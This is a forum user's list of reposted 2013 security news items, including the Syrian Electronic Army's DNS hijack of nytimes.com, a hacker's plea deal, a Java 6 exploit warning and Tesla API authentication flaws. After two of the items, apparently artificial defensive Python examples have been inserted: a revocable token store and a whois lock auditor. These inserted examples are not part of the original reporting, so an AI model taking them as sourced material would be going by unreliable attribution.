Matt

Everything posted by Matt

  1. The Syrian Electronic Army (SEA) targeted several prominent media agencies and websites, including The New York Times and Twitter in its latest cyber rampage. News of the attack broke after The New York Times website went offline and head of the Threat Research Center at WhiteHat Security, Matt Johansen, posted on Twitter that users were being redirected to an SEA site. The New York Times reported that employees have also received an email from the newspaper's chief information officer Marc Frons, advising them to "be careful when sending email communications until this situation is resolved". Frons explained that the hackers targeted the registrar used by the NYT, called Melbourne IT, which caused the site to drop offline. He called the incident a "malicious external attack" and showed the attacks had some serious capabilities. “In terms of the sophistication of the attack, this is a big deal,” he said. “It’s sort of like breaking into the local savings and loan versus breaking into Fort Knox. A domain registrar should have extremely tight security because they are holding the security to hundreds if not thousands of websites.” Indeed, director at AlienVault labs, Jaime Blasco said research showed the new attack had features indicating a secondary purpose to steal passwords from unwary web users trying to access the news site. "Hackers who successfully break into Melbourne IT's systems could potentially redirect and intercept emails sent to addresses under certain domains. Users of sites that don't begin with ‘https' could have been fooled into entering passwords that could have been captured," he wrote. The New York Times was one of many sites hit by the SEA. Alienvault has since published a full list of all the sites targeted during the SEA's latest raid, with other key victims including Twitter and Huffington Post. The attacks are the latest in a wider campaign against the Western media by the SEA. 
The group first appeared in May 2011 targeting any website or media outlet publishing material criticising Syrian president Bashar al-Assad. As such, Imperva senior security strategist Barry Shteiman said the group's high success rate targeting media outlets is poignant proof that most companies are still running on outdated security services. "At some point, CIOs need to realise that critical pieces of their online entities are controlled by vendors, and that security policies should apply to them as well. Companies should create contingency plans, and check the security measurements taken by their third-party content and infrastructure providers. A DNS is, unfortunately, a great example," he said. He added that the high success rate of the attacks means groups like the SEA will continue to operate and become more tenacious. "It makes lots of sense for a hacktivist group – that wishes to display their message and show that they exist – to go after high-end media," he said. "The SEA has been actively hacking Twitter accounts of news sites and have recently escalated to hacking into the websites themselves to create awareness. This is, in essence, what hacktivism is. There is no profit involved, however making all of us aware of the Syrian rebellion is their goal. The Syrian Electronic Army is very successful in creating the awareness that they are after." The SEA is one of many hacktivist groups currently operating. Prior to the recent campaign, security firm Mandiant reported linking a Chinese hacktivist military cell to attacks on The New York Times. The attacks were reportedly "payback" for a series of articles the paper published about Chinese prime minister Wen Jiabao. Source V3.CO.UK
  2. HP has unveiled a new Fortify Static Code Analyzer 4.0, claiming the tool will improve companies' software security assessment speeds tenfold. HP said the new Fortify Static Code Analyzer improves on previous versions by using more accurate and parallelised static application security testing procedures and will offer a variety of cyber security improvements. These include the ability to create better software security intelligence reports and a 20 percent reduction in false positive results compared with previous versions. The new reports will include key information offering IT administrators risk-ranked lists of issues for mobile, web, client and server applications, making it easier for them to spot serious vulnerabilities before they are exploited. The new Fortify Static Code Analyzer can also reduce application development times, says HP, allowing full application scanning that runs in tandem with the app-development process. The service also features flexible deployment options with HP offering on-premise or on-demand access. The news follows widespread warnings from within the security community that the threats facing companies are increasing. Most recently McAfee reported seeing a marked spike in the number of ransomware and mobile banking attacks active in the wild in its Second Quarter Threat Report. HP vice president and general manager of Enterprise Security Products Mike Armistead said businesses need analytics tools such as Fortify Static Code Analyzer 4.0 to deal with the new threats. "Software security vulnerabilities are becoming more prevalent as the demand to support new technology needs escalates," he said. "A holistic approach to software security is imperative, and with the HP Fortify portfolio, organisations have the ability to assess vulnerabilities across all of their software, assure security flaws are resolved before deployment, and protect applications from attacks once in production." Source V3.CO.UK
  3. Microsoft has more than tripled the available storage on its SkyDrive Pro storage product for Office 365 business subscribers as it hits back at rivals such as Box in the storage market. In a notable boost to the offering, users are now given 25GB of storage, up from the 7GB previously offered, while administrators can boost storage to 50GB or 100GB for users whenever necessary. The firm has also added new functions to make it easier for users to find documents that have been shared with them by colleagues. Writing on a blog, senior product managers for the SharePoint marketing team, Mark Kashman and Tejas Mehta, said that upping the storage would ensure businesses could meet their storage needs from the start. "If you and your company have growing storage needs across your various work streams and content types, we think you'll find Office 365 offers ample headroom on day one, at no additional cost," they wrote. "SharePoint Online admins can now increase SkyDrive Pro storage space for those individuals that need and want more than the default 25GB of storage. You can select increases in increments, up to 50GB or 100GB, and you can adjust the storage for up to 25 users at once." Purchasing new storage is done through the Storage Metrics page on the Site Settings control panel, with each gigabyte costing $0.20 a month, Microsoft explained. The move comes just a week or so after dedicated cloud storage firm Box boosted its free offering from 5GB to 10GB, taking it past Microsoft’s previous 7GB offering. In another boost to its service, Microsoft has also added a new Shared with Me view within the control panel so users can just see the documents that have been shared more easily, as Kashman and Mehta explained. “Have you ever experienced the pain of trying to locate a document or folder a colleague previously shared with you? 
Shared with Me eliminates the worry of finding those important items, because now they're all visible in a single view from within your SkyDrive Pro," they wrote. The move from Microsoft underlines the growing battle for the cloud storage market as enterprises embrace the benefits that allowing employees to store and access data from any location allows. Source V3.CO.UK
  4. The US hacker caught after trying to sell Department of Energy supercomputer logins to an undercover FBI agent has pleaded guilty in a deal that could see him go to jail for up to 18 months. The 24-year-old hacker, Pennsylvania man Andrew James Miller, pleaded guilty to charges of conspiracy and computer fraud to cut his potential sentence down from 15 years in prison. According to court filings, Miller said he had accessed a number of corporate and government systems, including ones at American Express and Google, by hacking employee computers and stealing their logins. He started out peddling lists of usernames and passwords to the undercover agent for payments of between $500 and $1,000 and then tried to get $50,000 for access to a supercomputer at the DoE's National Energy Research Scientific Computing Centre, according to court transcripts. Miller, whose handle was "Green", was part of the hacker group Underground Intelligence Agency (UIA). According to the unsealed indictment, he was set up with the undercover Fed after the FBI turned fellow member Robert "Intel" Burns into a witness in 2010. Following his jail time, Miller will be on supervised release for three years and is also required to pay a fine and restitution to victims, which has yet to be calculated by the court. His sentencing is scheduled for 19 November. ® Source TheRegister.co.uk
  5. Description: This bulletin summary lists four re-released Microsoft security bulletins for August, 2013.
Author: microsoft.com
Source: Microsoft Security Bulletin Re-Release For August, 2013 (Packet Storm)
Code:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

********************************************************************
Title: Microsoft Security Bulletin Re-Releases
Issued: August 27, 2013
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment. Please see the appropriate bulletin for more details.

* MS13-057 - Critical
* MS13-061 - Critical
* MS13-jul
* MS13-aug

Bulletin Information:
=====================

MS13-057 - Critical
- https://technet.microsoft.com/security/bulletin/MS13-057
- Reason for Revision: V3.0 (August 27, 2013): Bulletin revised to rerelease security update 2803821 for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; security update 2834902 for Windows XP and Windows Server 2003; security update 2834903 for Windows XP; security update 2834904 for Windows XP and Windows Server 2003; and security update 2834905 for Windows XP. Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 customers should install the rereleased updates. See the Update FAQ for more information.
- Originally posted: July 9, 2013
- Updated: August 27, 2013
- Bulletin Severity Rating: Critical
- Version: 3.0

MS13-061 - Critical
- https://technet.microsoft.com/security/bulletin/MS13-061
- Reason for Revision: V3.0 (August 27, 2013): Rereleased bulletin to announce the reoffering of the 2874216 update for Microsoft Exchange Server 2013 Cumulative Update 1 and Microsoft Exchange Server 2013 Cumulative Update 2. See the Update FAQ for details.
- Originally posted: August 13, 2013
- Updated: August 27, 2013
- Bulletin Severity Rating: Critical
- Version: 3.0

* MS13-jul
- https://technet.microsoft.com/security/bulletin/ms13-jul
- Reason for Revision: V3.0 (August 27, 2013): For MS13-057, bulletin revised to rerelease security update 2803821 for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; security update 2834902 for Windows XP and Windows Server 2003; security update 2834903 for Windows XP; security update 2834904 for Windows XP and Windows Server 2003; and security update 2834905 for Windows XP. Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 customers should install the rereleased updates that apply to their systems. See the bulletin for details.
- Originally posted: July 9, 2013
- Updated: August 27, 2013
- Version: 3.0

* MS13-aug
- https://technet.microsoft.com/security/bulletin/ms13-aug
- Reason for Revision: V3.0 (August 27, 2013): For MS13-061, bulletin revised to announce the reoffering of the 2874216 update for Microsoft Exchange Server 2013 Cumulative Update 1 and Microsoft Exchange Server 2013 Cumulative Update 2. See the bulletin for details.
- Originally posted: August 13, 2013
- Updated: August 27, 2013
- Version: 3.0

Other Information
=================
Follow us on Twitter for the latest information and updates: http://twitter.com/msftsecresponse

Recognize and avoid fraudulent email to Microsoft customers:
=============================================================
If you receive an email message that claims to be distributing a Microsoft security update, it is a hoax that may contain malware or pointers to malicious websites. Microsoft does not distribute security updates via email.

The Microsoft Security Response Center (MSRC) uses PGP to digitally sign all security notifications. However, it is not required to read security notifications, security bulletins, security advisories, or install security updates. You can obtain the MSRC public PGP key at https://technet.microsoft.com/security/bulletin/pgp.

To receive automatic notifications whenever Microsoft Security Bulletins and Microsoft Security Advisories are issued or revised, subscribe to Microsoft Technical Security Notifications on http://technet.microsoft.com/security/dd252948.

********************************************************************
THE INFORMATION PROVIDED IN THIS MICROSOFT COMMUNICATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
********************************************************************

To manage or cancel your subscription to this newsletter, visit the Microsoft.com Profile Center at <http://go.microsoft.com/fwlink/?LinkId=245953> and then click Manage Communications under My Subscriptions in the Quicklinks section. For more information, see the Communications Preferences section of the Microsoft Online Privacy Statement at: <http://go.microsoft.com/fwlink/?LinkId=92781>.

For the complete Microsoft Online Privacy Statement, see: <http://go.microsoft.com/fwlink/?LinkId=81184>.

For legal Information, see: <http://www.microsoft.com/info/legalinfo/default.mspx>.

This newsletter was sent by:
Microsoft Corporation
1 Microsoft Way
Redmond, Washington, USA 98052

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsFVAwUBUhvZ1hWqSyu+jsPhAQgOlhAA1LEh6v8Ig26xht2EgSo2R4tx4Pb5+584
DV4OLR6JXnYIPM/VwmnaNJ6Bftt7MnwD3fpYDq1HmyZZqnwuzp0ocIKczUTQ9sOC
uig6YXoTOAahTfGNQi/dDX0toy5ydME8MWf/KIiKmZ7ziUTpNlNYF4QC5riHMCRb
PGwoR1PkwVrJA6p9DYGmMAP+VISCyu6U5Z6JXNIF3PM5Iz33xMQqgEcqZqXDTRoG
bxi4XUfhLtDB/P/toqawHr+bZp895u1ZMpL/nlPiB39RKmAE5eM3CqTxD05UgiAx
wOIn7hvJ6IA77iXW4vgxd3PIJzAqx5v7s98PWWtTYbPvsr3n9A19fnV9uLJxQJmm
vwLV1SzkVHuq9CD4E5QqVuhNRnV48l7ieQI/S2bYpdORbm0wuKmPWvp2ZW5DDhuy
GTRQdGJgpq4dRM18xJqFwKokSwx4Sz+EfHKdfm5tm+qB19p1DcSGeKxeI2Gtd8BP
6vEQKwbM+sifwloVa2YWpW29vxVTbyYEPjGjxQ6Guch+dI7n2a+D6j9eY8GKQAOA
3RBSSTeLlm5zFuU0AiaXphnMG38EF7i6Cp3HO0Kd+qtRzHm+RctnxmZlWl6bMzsA
PvQqigj/I0g1X8JivzNe/O7NHpNMQwEgCoHppomXi1S2gy+DwSrIoJ/8kzowIUPK
j1nMKU2vXfc=
=xrTY
-----END PGP SIGNATURE-----
  6. SECURITY RESEARCHERS are urging users of Oracle's Java 6 software to upgrade to Java 7 as soon as possible to avoid becoming the victims of active cyber attacks. F-secure senior analyst Timo Hirvonen warned about the exploit this weekend over Twitter, advising that he had found an exploit in the wild actively targeting an unpatched vulnerability in Java 6, named CVE-2013-2463. CVE-2013-2463 was addressed by Oracle in the June 2013 Critical Patch Update for Java 7. Java 6 has the same vulnerability, as Oracle acknowledged in the update, but since Java 6 became unsupported in April 2013, there is no patch for the Java 6 vulnerability. Cloud security provider Qualys described the bug as an "implicit zero-day vulnerability". The firm's CTO Wolfgang Kandek said he had seen it included in the spreading Neutrino exploit kit threat, which "guarantees that it will find widespread adoption". "We know about its existence, but do not have a patch at hand," Kandek said in a blog post. "This happens each time a software package loses support and we track these instances in Qualysguard with our 'EOL/Obsolete' detections, in this case. "In addition, we still see very high rates of Java 6 installed, a bit over 50 percent, which means many organisations are vulnerable." Like F-secure, Kandek recommended that any users with Java 6 upgrade to Java 7 as soon as they can. "Without doubt, organisations should update to Java 7 where possible, meaning that IT administrators need to verify with their vendors if an upgrade path exists," he added. µ Source TheInquirer.Net
  7. According to estimates by The PhoneGeeks, EuroGsm's mobile telephony technical team, 85% of local smartphone users do not use mobile applications to secure these devices. Among the biggest specific risks are unauthorised access to confidential data and theft of information, difficulty in locating the device via GPS and the impossibility of locking the handset remotely if it is lost or stolen. "Most users do not see the device as a target for cyber attacks and, consequently, do not use mobile security applications either. The biggest risk is the theft of information from the phone, such as email passwords, the phone book or other data that can lead to significant losses," explained Adi Coman – The PhoneGeeks. The most recommended mobile security applications are antivirus programs, which protect against access to confidential data and theft of information, but there are also applications that allow the device to be locked if lost or stolen, locate the phone via GPS and notify the user by SMS with its coordinates.
Antivirus and location apps for Android and iOS
According to The PhoneGeeks' recommendations, the most suitable antivirus applications for Android devices are Bitdefender Mobile Security, Avast Mobile Security, AVG Antivirus or Lookout Security and Antivirus. "The recommended applications are free and use few resources, which keeps the mobile device running in optimal conditions, and the graphical interface is easy to use. Free and paid software behave roughly the same in securing the phone, the differences being the extra options included in the paid applications, whose price varies between 4 and 15 euros," said Radu Boanca – The PhoneGeeks.
For iOS devices, the EuroGsm consultant recommends antivirus apps such as McAfee Global Threat Intelligence Mobile, iSafeGuard, Lookout or VirusBarrier. Among the most widely used programs locally for locating smartphones via GPS are Find my iPhone (for iOS) and Find my Phone (for Android) respectively, with Wheres My Droid being a similar application.
Tips for improving mobile device security
To improve mobile device security, The PhoneGeeks recommend setting access codes, as well as downloading security applications only from the Google Play, AppStore or Windows Phone stores. "It is advisable not to install applications from unknown sources and to be careful when certain installed applications ask for access to personal information," added Marius Boca of The PhoneGeeks.
About EuroGsm
EuroGsm is the largest domestic telecom retailer, with a network of stores extended to 80 cities and 112 outlets in its 16 years of existence. The company brings the latest trends in mobile communication to the market by diversifying its portfolio of products and services, and offers innovative communication solutions, latest-generation phones, accessories and a varied range of services, such as bill payment and voice or data subscriptions. EuroGsm is the guide you want beside you when you set out to explore technology. Source: totalPR relatii publice / Agentie de relatii publice | totalPR
  8. Bitdefender, the leader of the Romanian antivirus solutions market, announces the launch of the new version of its security application for Android devices, Bitdefender Mobile Security, which offers protection against viruses and constant information about possible leaks of personal data. The software, which has obtained maximum scores in independent security tests, now includes Privacy Advisor, a feature that lets users monitor suspicious applications that may endanger the confidentiality of personal data, are careless with sensitive information or deliver spam. "Threats to Android devices are more and more frequent and varied. Traditional viruses remain a permanent danger, and the new threats arise mainly from the applications that users install on their phones. We have equipped Bitdefender Mobile Security to protect devices from all these dangers and from the new ones that appear every day," said Cătălin Coșoi, Chief Security Strategist, Bitdefender. Privacy Advisor supplements the other features of Bitdefender Mobile Security, including on-demand scanning, remote device locking, minimal impact on the battery and the best-performing antivirus technology. Last month Bitdefender Mobile Security obtained the maximum score for the second time in a row in tests carried out by the independent evaluation company AV-TEST. The solution scored 6 points out of 6 both for protection and for ease of use, repeating the perfect score achieved in the May/June sessions. Bitdefender Mobile Security detected 100% of the viruses it was tested with during the month and raised no false alarms. The test also showed that Bitdefender Mobile Security has no impact on battery life, does not slow down operation under normal use and does not generate excess internet traffic.
The application is available on Google Play: https://play.google.com/store/apps/details?id=com.bitdefender.security&feature More details about the AV-Test tests: AV-TEST - The Independent IT-Security Institute: Jul 2013 AV-TEST - The Independent IT-Security Institute: May 2013 Source FaraVirusi.Com
  9. A new Web-based service for cybercriminals automates the creation of fake scanned documents that can help fraudsters bypass the identity verification processes used by some banks, e-commerce businesses and other online services providers, according to researchers from Russian cybercrime investigations firm Group-IB. The service can generate scanned copies of passports, ID cards and driver's licenses from different countries for identities supplied by the service users, fake scanned utility bills from various companies, as well as fake scanned copies of banking statements and credit cards issued by a large number of banks, said Andrey Komarov, head of international projects at Group-IB, via email. It is common practice for banks, payment and money transfer providers, online gambling sites and other types of businesses that engage in money transactions via the Internet to ask their customers for scanned copies of documents in order to prove their identities or verify their physical addresses, especially when their anti-fraud departments detect suspicious account activity. Using image manipulation software to change the photo, name and other details on a scanned ID is obviously not a new practice, but services like the one identified by Group-IB that automate the whole process and produce high-quality results are new on the cybercriminal market, Komarov said. According to Group-IB, the service is provided through a website hosted on a server in Germany. The domain name was registered in May, but the service was launched in mid-August, Komarov said. Independent cybercrime researcher Dancho Danchev described a similar service in a July blog post, however, Komarov could not confirm whether it is the same one because there was no reference to the service's domain name in Danchev's report. 
The service found by Group-IB has templates for passports, ID cards and driver's licences for the U.S., Canada, Russia, the U.K., Germany, the Netherlands and other European Union countries. It also has templates for bank statements, credit cards -- front and back -- and utility bills from banks and utility companies operating in those countries. The templates are for documents and cards that show signs of use and are scanned at different angles and different positions on the canvas. This makes the resulting image appear more authentic. Using the service, a cybercriminal can get a counterfeit scanned document in JPG or PNG image format in around 40 seconds, Komarov said. Scans of U.S. passports are the most expensive product and cost $11 each. Other scanned documents are priced at $7.99 or $9.99 each. Cybercriminals can pay using several online payment services and virtual currencies including WebMoney, Perfect Money, Bitcoin, Paymer and a new payment service called papogo.com that caters to the black market, Komarov said. Some companies that use scanned documents for identity verification have specialized systems and tools that can detect image modifications, Komarov said. When there is suspicion about the authenticity of a scan, the anti-fraud teams will request images with better quality to verify that they are really created by the user, he said. However, sometimes companies don't have the resources to perform detailed checks of incoming scans and criminals are exploiting this, Komarov said. Source ComputerWorld.Com
  10. A Pennsylvania man who was allegedly a member of the computer hacking group the Underground Intelligence Agency has pleaded guilty to one count of conspiracy and two counts of computer intrusion, the U.S. Department of Justice announced. Andrew James Miller, 23, of Devon, Pennsylvania, pleaded guilty Tuesday in the U.S. District Court for the District of Massachusetts. He and other hackers conspired to install backdoors into computer networks and sell root access to those networks, according to court documents. Between 2008 and 2010, Miller gained access to the computer networks of a Massachusetts telecommunications provider's network, a Colorado advertising agency and the U.S. Department of Energy, according to court documents. He then offered, in online chats, to sell log-in credentials to those networks for up to US$1,000, according to the indictment filed in the Massachusetts court. Miller is scheduled to be sentenced on Nov. 19. The maximum penalty for the conspiracy count is five years in prison. One of the computer intrusion counts carries a maximum penalty of five years in prison and the other, involving intentional damage to a private computer, carries a maximum penalty of 10 years in prison. Grant Gross covers technology and telecom policy in the U.S. government for The IDG News Service. Follow Grant on Twitter at GrantGross. Grant's e-mail address is grant_gross@idg.com. Source ComputerWorld.Com
  11. Slack authentication in Tesla's Model S REST API exposes the electric car to a variety of non-safety but non-trivial attacks, according to a Dell engineer and Tesla owner. In this post over at O'Reilly, Dell senior distinguished engineer and executive director of cloud computing George Reese says the “flawed” authentication protocol in the Tesla REST API “makes no sense”. Rather than using OAuth, Tesla has decided to craft its own authentication, which Reese unpicked. There's one small reassurance for owners of the 'leccy car: none of the vulnerabilities he discusses cause any kind of safety issue – although he creepily notes that an attacker would be able to see everywhere the car goes. Tesla, it turns out, has broken one of the golden rules of security – the one that says “don't re-use user IDs and passwords for different functions”. In this case, the e-mail and password used to build the car at the Tesla Website are retained later for customers logging into the car via the Website. There's also a persistence issue: when a user logs into the Tesla Website to get to their car, it creates a three-month token for which there's no revocation mechanism. If the system is compromised, the attacker would have access to the login for three months, and if “an attacker gains access to a website’s database of authenticated tokens,” then all the cars would be visible to the attacker. While the flaw doesn't offer access to any “operational” aspects of the car – like steering or brakes – the risks are still significant. An attacker could fool around with configuration settings, the climate control, the sunroof, open the charge port, and anything else supported by the API. Apart from tracking owners' movements, “there is enough here to do some economic damage both in terms of excess electrical usage and forcing excess wear on the batteries”, Reese notes. Reese links to an unofficial documentation of the API, which outlines its capabilities, here. ® Source TheRegister.Co.Uk
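The post above faults two properties of the Tesla Website tokens it describes: a three-month lifetime and no revocation path. The following is an added example, not code from the article, from Tesla or from the unofficial API documentation it links to, of a minimal bearer-token store that has both properties the post says are missing: a short configurable lifetime, per-token revocation, and bulk revocation for one user (the hook a password change or compromise report would call). All names (`TokenStore`, `issue`, `validate`, `revoke_all_for_user`) are hypothetical.

```python
"""Added example (hypothetical names): an in-memory bearer-token store with
expiry and revocation, the two controls the post says the described design
lacks. Not Tesla's code and not the API the post discusses."""
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple


@dataclass
class TokenStore:
    """Opaque bearer tokens keyed to a user and an issue time.

    lifetime: seconds a token stays valid after issue. The post describes a
    three-month window (~7.8 million seconds); a remote-control API session
    should be far shorter, so the default here is one hour.
    """
    lifetime: float = 3600.0
    _tokens: Dict[str, Tuple[str, float]] = field(default_factory=dict)
    _revoked: Set[str] = field(default_factory=set)

    def issue(self, user: str, now: Optional[float] = None) -> str:
        """Mint a 256-bit random token for `user`; unguessable by construction."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (user, now)
        return token

    def validate(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the owning user, or None if the token is unknown, revoked
        or older than `lifetime`."""
        now = time.time() if now is None else now
        if not token.isascii():
            return None  # compare_digest on str requires ASCII on both sides
        # Scan every stored token with a constant-time compare instead of a
        # dict lookup, so response timing does not leak partial matches.
        match = None
        for stored in self._tokens:
            if hmac.compare_digest(stored, token):
                match = stored
        if match is None or match in self._revoked:
            return None
        user, issued = self._tokens[match]
        if now - issued > self.lifetime:
            return None
        return user

    def revoke(self, token: str) -> None:
        """Revoke one token: logout, or a single stolen device."""
        self._revoked.add(token)

    def revoke_all_for_user(self, user: str) -> int:
        """Revoke every live token for `user` (password change, account
        compromise) and return how many were revoked."""
        count = 0
        for token, (owner, _) in self._tokens.items():
            if owner == user and token not in self._revoked:
                self._revoked.add(token)
                count += 1
        return count


if __name__ == "__main__":
    store = TokenStore(lifetime=3600)
    t = store.issue("alice", now=1000.0)
    print(store.validate(t, now=1500.0))   # alice
    store.revoke(t)
    print(store.validate(t, now=1500.0))   # None
```

The `now` parameter exists so the expiry rule can be exercised deterministically; production callers leave it unset. The revocation set is the piece that turns a stolen-database scenario from "every car visible for three months" into "every token dead as soon as the operator calls `revoke_all_for_user` for each account".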
  12. Cracker collective the Syrian Electronic Army – or someone using its name – has claimed responsibility for domain-hijacking Twitter.co.uk, nytimes.com and huffingtonpost.co.uk. At the time of writing, many of the domains the SEA claimed to have hijacked were back under their owners' control. In some cases, only the contact records for domains were altered. However, nytimes.com currently returns the SEA as its nameserver. The New York Times has attributed an outage last Tuesday to malicious activity, and while it didn't nominate the SEA, its workaround made it clear that a domain redirect was the problem, since it pointed readers at its IP address to get to its site. So far, the SEA's threat against the Huffington Post doesn't seem to have eventuated. Twitter users are attributing the problems to registrar MelbourneIT, which is common to many of the hijacked domains. HD Moore of Metasploit Framework fame has told Mashable that "if the attackers have found a weakness in the MelbourneIT system", then other domains would also be at risk. The New York Times also attributes the attack to MelbourneIT: "The New York Times Web site was unavailable to readers on Tuesday afternoon following an attack on the company's domain name registrar, Melbourne IT. The attack also required employees of The Times to stop sending out sensitive e-mails", it has told employees. The Register has tried to contact MelbourneIT, so far without success. ® Update: While MelbourneIT has yet to return calls from Vulture South, it has apparently told Business Insider a reseller was responsible for the hijacked domains. Its statement is below.
The credentials of a Melbourne IT reseller (username and password) were used to access a reseller account on Melbourne IT's systems. The DNS records of several domain names on that reseller account were changed – including nytimes.com. Once Melbourne IT was notified, we:
- changed the affected DNS records back to their previous values
- locked the affected records from any further changes at the .com domain name registry
- changed the reseller credentials so no further changes can be made
- We are currently reviewing our logs to see if we can obtain information on the identity of the party that has used the reseller credentials, and we will share this information with the reseller and any relevant law enforcement bodies.
We will also review additional layers of security that we can add to our reseller accounts. For mission critical names we recommend that domain name owners take advantage of additional registry lock features available from domain name registries including .com – some of the domain names targeted on the reseller account had these lock features active and were thus not affected. Source TheRegister.Co.Uk
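The Melbourne IT statement above makes a concrete recommendation: put mission-critical names behind a registry lock, which the statement says protected some of the domains on the same reseller account. Whether a name has that lock is visible in the EPP status codes a whois lookup returns (the registry-level `serverUpdateProhibited`, `serverTransferProhibited` and `serverDeleteProhibited`, as opposed to the registrar-level `client*` codes a reseller account can clear). The following is an added example, not from the article, Melbourne IT or the SEA post, that parses those status lines and the nameserver lines from whois text, classifies the lock level, and flags the nameserver change the article describes. The whois records are constructed samples; the domain names in them are placeholders.

```python
"""Added example: classify a domain's EPP lock level from whois output and
detect nameserver drift against a recorded baseline. Whois text below is
constructed for the example; it is not real output for any real domain."""
import re
from enum import Enum
from typing import List, Set

# ICANN EPP status codes: server* are set by the registry (registry lock),
# client* by the registrar and so can be removed through a registrar account.
REGISTRY_LOCK = {"serverUpdateProhibited", "serverTransferProhibited",
                 "serverDeleteProhibited"}
REGISTRAR_LOCK = {"clientUpdateProhibited", "clientTransferProhibited",
                  "clientDeleteProhibited"}


class LockLevel(Enum):
    NONE = "no lock"
    PARTIAL = "some prohibitions set, but not a full lock"
    REGISTRAR = "registrar (client*) lock only"
    REGISTRY = "registry (server*) lock"


STATUS_RE = re.compile(r"^\s*Domain Status:\s*(\w+)", re.IGNORECASE | re.MULTILINE)
NS_RE = re.compile(r"^\s*Name Server:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def parse_statuses(whois_text: str) -> Set[str]:
    """EPP status codes from 'Domain Status:' lines (trailing URL ignored)."""
    return set(STATUS_RE.findall(whois_text))


def parse_nameservers(whois_text: str) -> Set[str]:
    """Nameserver hostnames, lower-cased so case differences do not alert."""
    return {ns.lower().rstrip(".") for ns in NS_RE.findall(whois_text)}


def classify(statuses: Set[str]) -> LockLevel:
    """Full registry lock needs all three server* codes; full registrar lock
    all three client*; anything else set is PARTIAL, nothing set is NONE."""
    if REGISTRY_LOCK <= statuses:
        return LockLevel.REGISTRY
    if REGISTRAR_LOCK <= statuses:
        return LockLevel.REGISTRAR
    if statuses & (REGISTRY_LOCK | REGISTRAR_LOCK):
        return LockLevel.PARTIAL
    return LockLevel.NONE


def audit(baseline_whois: str, current_whois: str) -> List[str]:
    """Findings a monitoring job would raise: lock weaker than registry level,
    or nameservers that differ from the recorded baseline."""
    findings = []
    level = classify(parse_statuses(current_whois))
    if level is not LockLevel.REGISTRY:
        findings.append(f"lock level is '{level.value}'; registry lock recommended")
    before, after = parse_nameservers(baseline_whois), parse_nameservers(current_whois)
    if before != after:
        findings.append(f"nameservers changed: {sorted(before)} -> {sorted(after)}")
    return findings


# Constructed sample records (placeholder domains, not real whois output).
SAMPLE_REGISTRY_LOCKED = """\
Domain Name: EXAMPLE-LOCKED.TEST
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.EXAMPLE-LOCKED.TEST
Name Server: NS2.EXAMPLE-LOCKED.TEST
"""

SAMPLE_BASELINE = """\
Domain Name: EXAMPLE-NEWS.TEST
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Name Server: NS1.EXAMPLE-NEWS.TEST
Name Server: NS2.EXAMPLE-NEWS.TEST
"""

# Same name after the kind of change the article describes: the registrar
# lock is gone and the nameservers now point somewhere else.
SAMPLE_CHANGED = """\
Domain Name: EXAMPLE-NEWS.TEST
Domain Status: ok https://icann.org/epp#ok
Name Server: ns1.elsewhere.test
Name Server: ns2.elsewhere.test
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_BASELINE, SAMPLE_CHANGED):
        print("ALERT:", finding)
```

Run periodically against stored whois snapshots, `audit` gives two cheap signals that would have surfaced the incident the article describes: a name that never reached registry-lock level, and a nameserver set that no longer matches what the owner recorded.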
  13. Intel has released the Intel C++ Compiler v13.0 for Android OS, its first attempt at delivering an optimizing C/C++ compiler designed specifically for Google's mobile platform. The release is notable for a number of reasons. First, the overwhelming majority of Android devices are currently built around chips based on the ARM architecture. Intel's compilers can only output code for its own chips, including its Atom line of mobile processors. Second, the majority of Android app development is done not in C++ but in Java. Specifically, developers use Oracle's Java SDK to compile their code and then run it through a further tool that converts it into Android's unique Dalvik binary format, which can be executed by virtual machines running on a variety of chips. Still other developers build Android apps using HTML5 and related technologies, which typically don't require a compiler at all. Intel says it's not trying to lure developers away from any of these methods. Instead, its new C++ Compiler for Android is designed for apps that take advantage of the Android Native Development Kit (NDK), which is typically used to develop components for performance-intensive apps, such as games. The current version of the Android NDK uses version 4.6 of the open source GNU Compiler Collection (GCC) toolchain by default. But Intel's compilers include lots of proprietary optimizations for its own chips, and can often output executable code that performs better than that produced by third-party compilers such as GCC. According to Intel's FAQ, its C++ Compiler for Android provides drop-in source code compatibility with GNU C++, but it outputs more efficient code that executes faster and helps keep devices cool and power consumption low. The new compiler can't be used to generate code that runs on Windows, OS X, desktop Linux, or any other operating system.
